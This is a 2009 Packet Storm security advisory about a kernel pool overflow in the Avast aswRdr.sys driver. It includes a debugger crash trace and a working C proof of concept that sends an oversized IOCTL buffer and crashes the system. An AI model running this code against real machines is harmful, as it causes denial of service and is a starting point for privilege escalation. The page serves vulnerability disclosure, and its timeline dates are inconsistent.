what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Avast! Corruption / Escalation

Avast! Corruption / Escalation
Posted Nov 18, 2009
Authored by Evilcry, AbdulAziz Hariri

Avast's aswRdr.sys driver does not sanitize user supplied input IOCTL and this may lead to a kernel heap overflow that propagates on the system with a BSOD and offers potential risk of privilege escalation. Proof of concept code included.

tags | exploit, overflow, kernel, proof of concept
SHA-256 | b35d3031b9047fb77a41797ff7afab2b0ef69ed1772c46257f660d79981cbdb9

Avast! Corruption / Escalation

Change Mirror Download
http://www.efblog.net/2009/11/avast-aswrdrsys-kernel-pool-corruption.html

=============[Avast aswRdr.sys Kernel Pool Corruption and Local
Privilege Escalation]================

Author(s): Giuseppe 'Evilcry' Bonfa'
AbdulAziz Hariri

E-Mail: evilcry {AT} GMAIL {DOT} COM
Website: http://evilcry.netsons.org
http://www.insight-tech.org
http://evilcodecave.blogspot.com
http://evilcodecave.wordpress.com


Copyright 2009 Giuseppe Bonfa'. All rights reserved.


***Disclosure Timeline***

Discover Date: -
PoC Code: porting C++ 26/09/2009
Vendor Notify: 26/09/2009
Vendor Reply: 15/09/2009
Vendor Fix: 15/10/2009

======================
Product Details:
======================

Affected Product: Avast antivirus (other versions could be affected)
Product Version: 4.8.1356.0
Vulnerable Compoonent: aswRdr.sys 4.8.1356.0 (avast! TDI RDR Driver)
Category: Local Denial of Service due to kernel memory corruption (BSOD)
(untested) Local Privilege Escalation

Notes: Tested on XP Sp0-Sp2 fixed faulting process IExplorer 6

======================
Vulnerability Details:
======================

Avast's aswRdr.sys Driver does not sanitize user supplied input
IOCTL) and this lead to Kernel Heap Overflow that propagates
on the system with a BSOD and potential risk of Privilege Escalation.

==================
Technical Details:
==================

kd> !analyze -v

Bugcheck: BAD_POOL_HEADER

Arg1: 00000020, a pool block header size is corrupt.
Arg2: 8136c618, The pool entry we were looking for within the page.
Arg3: 8136c778, The next pool entry. <-- OVERWRITTEN HEADER
Arg4: 1a2c0001, (reserved)

POOL_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
8136c618

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be
wrong.
f7c70a18 80543c86 00000019 00000020 8136c618 nt+0x21925
f7c70a68 804f388c 8136c620 00000000 81571de8 nt+0x6cc86
f7c70abc 804fcfbf 81571de8 f7c70b08 f7c70afc nt+0x1c88c
f7c70b0c 806d1c35 00000000 00000000 f7c70b24 nt+0x25fbf
f7c70b24 806d1861 badb0d00 00000000 81603548 hal+0x2c35
f7c70bb4 804f0498 81571de8 81348028 00000000 hal+0x2861
f7c70be8 f76ee9ad 81347ec8 81565740 00000000 nt+0x19498
f7c70c1c f76ee333 81347ec8 81571da8 81664e28 aswRdr+0x9ad
f7c70c58 805749d1 81347ec8 81571da8 81348028 aswRdr+0x333
f7c70d00 8056d33c 0000001c 00000000 00000000 nt+0x9d9d1
f7c70d34 8053c808 0000001c 00000000 00000000 nt+0x9633c
f7c70d64 7c91eb94 badb0d00 0012fee0 04040404 nt+0x65808
f7c70d68 badb0d00 0012fee0 04040404 04040404 0x7c91eb94
f7c70d6c 0012fee0 04040404 04040404 00000000 0xbadb0d00
f7c70d70 04040404 04040404 00000000 00000000 0x12fee0
f7c70d74 04040404 00000000 00000000 00000000 0x4040404
f7c70d78 00000000 00000000 00000000 00000000 0x4040404


==================
Proof of Concept:
==================

Exploitation for Privilege Escalation is not Trivial but Possible


+---------------------------------------------------------------------------+
/* Avast 4.8.1356.0 antivirus aswRdr.sys Kernel Pool Corruption
*
* Author(s): Giuseppe 'Evilcry' Bonfa'
* AbdulAziz Hariri
* E-Mail: evilcry _AT_ gmail _DOT_ com
* Website: http://evilcry.netsons.org
* http://evilcodecave.blogspot.com
* http://evilcodecave.wordpress.com
* http://evilfingers.com
*
* Disclosure Timeline: As specified in the Advisory.
*/

#define WIN32_LEAN_AND_MEAN
#include
#include


BOOL OpenDevice(PWSTR DriverName, HANDLE *lphDevice) //taken from esagelab
{
WCHAR DeviceName[MAX_PATH];
HANDLE hDevice;

if ((GetVersion() & 0xFF) >= 5)
{
wcscpy(DeviceName, L"\\\\.\\Global\\");
}
else
{
wcscpy(DeviceName, L"\\\\.\\");
}

wcscat(DeviceName, DriverName);

printf("Opening.. %S\n", DeviceName);

hDevice = CreateFileW(DeviceName, GENERIC_READ | GENERIC_WRITE, 0,
NULL, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL);

if (hDevice == INVALID_HANDLE_VALUE)
{
printf("CreateFile() ERROR %d\n", GetLastError());
return FALSE;
}

*lphDevice = hDevice;

return TRUE;
}

int main()
{
HANDLE hDev = NULL;
DWORD Junk;

if(!OpenDevice(L"aswRDR",&hDev))
{
printf("Unable to access aswMon");
return(0);
}

char *Buff = (char *)VirtualAlloc(NULL, 0x156, MEM_RESERVE |
MEM_COMMIT, PAGE_EXECUTE_READWRITE);

if (Buff)
{
memset(Buff, 'A', 0x156);

DeviceIoControl(hDev,0x80002024,Buff,0x156,Buff,0x156,&Junk,(LPOVERLAPPED)NULL);
printf("DeviceIoControl Executed..\n");
}
else
{
printf("VirtualAlloc() ERROR %d\n", GetLastError());
}


return(0);
}


========
Credits:
========

Vulnerability found and advisory written by Giuseppe 'Evilcry' Bonfa'
and AbdulAziz Hariri.

===========
Disclaimer:
===========

The information within this advisory may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close